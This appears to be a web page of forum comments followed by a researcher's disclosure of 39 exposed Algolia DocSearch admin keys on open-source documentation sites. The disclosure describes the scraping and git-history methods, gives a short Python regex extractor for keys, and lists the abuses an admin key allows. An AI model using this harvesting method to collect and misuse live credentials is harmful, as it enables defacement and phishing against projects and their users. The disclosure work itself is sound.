I'm not a newspaper editor, but I think if this was an article for one, they'd also say the graphs are unnecessary. It smells of "I need some visual stuff to make this text interesting"...
Especially on night mode themes.
Besides, can we read anymore? In the age of 'GPT summarise it me' attention spans and glib commentary not about the content of the article being all many people have to add, perhaps liberal application of visualisations adds digestive value.
"If the secrets issuer partners with X-corp for secret scanning so that secrets get invalidated when you X them, then when you X them the secrets will be invalidated".
The above is a true statement for all X.
Unfortunately, it doesn't look like Algolia has implemented this
The poster is 16, he can take it as feedback towards effective writing. Or the intellectual HN crowd can just downvote it and dissuade me from contributing and helping a kid (oh look at me, how fucking noble am I, right?).
Ah, that feeling of "Am I the only one who gets it around here?". I wanted to explain to you why graph 2 is dumb, and graph 1 is very little information, but heck, I felt dissuaded.
In formal logic, that statement is true whether X is GitHub, or Lockheed-Martin, Safeway, or the local hardware store.
In English, the statement serves to inform (or remind) you that GitHub has a secret scanning program that many providers actually do partner with.
If you want to help, you should sound helpful.
Posts with just text are sense and just not nice to read. That's why even text-only blog posts have a tendency to include loosely-related image at the top, to catch reader's eye.
Not saying people shouldn't build these tools, but the use case is lost on me.
It feels like the industry is in this weird phase of trying to replace 30-year-old, perfectly optimized shell utilities with multi-shot agent workflows that literally cost money to run. A basic Python script with a regex matcher and the GitHub API will find these keys faster, cheaper, and more reliably.
Of course, if the goal is just to be right rather than to convince someone else about what's right, how you're saying something doesn't matter, but at that point you've already reached the goal before you started talking to them, so it's worth reexamining what you're actually looking to get out of a conversation at that point.
Last October I reported an exposed Algolia admin API key on vuejs.org. The key had full permissions: addObject, deleteObject, deleteIndex, editSettings, the works. Vue acknowledged it, added me to their Security Hall of Fame, and rotated the key.
That should have been the end of it. But it got me thinking: if Vue.js had this problem, how many other DocSearch sites do too?
Turns out, a lot.
Algolia's DocSearch is a free search service for open source docs. They crawl your site, index it, and give you an API key to embed in your frontend. That key is supposed to be search-only, but some ship with full admin permissions.
Most keys came from frontend scraping. Algolia maintains a public (now archived) repo called docsearch-configs with a config for every site in the DocSearch program, over 3,500 of them. I used that as a starting target list and scraped roughly 15,000 documentation sites for embedded credentials. This catches keys that don't exist in any repo because they're injected at build time and only appear in the deployed site:
APP_RE = re.compile(r'["\']([A-Z0-9]{10})["\']')
KEY_RE = re.compile(r'["\']([\da-f]{32})["\']')
def extract(text, app_ids, api_keys):
if not ALGOLIA_RE.search(text):
return
for a in APP_RE.findall(text):
if valid_app(a):
app_ids.add(a)
api_keys.update(KEY_RE.findall(text))
On top of that I ran GitHub code search to find keys in doc framework configs, then cloned and ran TruffleHog on 500+ documentation site repos to catch keys that had been committed and later removed.

35 of the 39 admin keys came from frontend scraping alone. The remaining 4 were found through git history. Every single one was active at the time of discovery.
The affected projects include some massive open source projects:

Home Assistant alone has 85,000 GitHub stars and millions of active installations. KEDA is a CNCF project used in production Kubernetes clusters. vcluster, also Kubernetes infrastructure, had the largest search index of any affected site at over 100,000 records.

Nearly all 39 keys share the same permission set: search, addObject, deleteObject, deleteIndex, editSettings, listIndexes, and browse. A few have even broader access including analytics, logs, and NLU capabilities.
In practical terms, anyone with one of these keys can:
Someone could poison a project's search results with malicious links, redirect users to phishing pages, or just nuke the entire index and wipe out search for the site completely.
SUSE/Rancher acknowledged the report within two days and rotated the key. That key is now fully revoked. Home Assistant also responded and began remediation, though the original key remains active.
I compiled the full list of affected keys and emailed Algolia directly a few weeks ago. No response. As of today, all remaining keys are still active.
This isn't really about 39 individual misconfigurations. Algolia's DocSearch program provides search-only keys, but many sites run their own crawler and end up using their write or admin key in the frontend config instead. Algolia's own docs warn against this, but it clearly happens at scale.
The fix is straightforward: if you're running DocSearch, check what key is in your frontend config and make sure it's search-only. If I found 39 admin keys with a few scripts, the real number is almost certainly higher.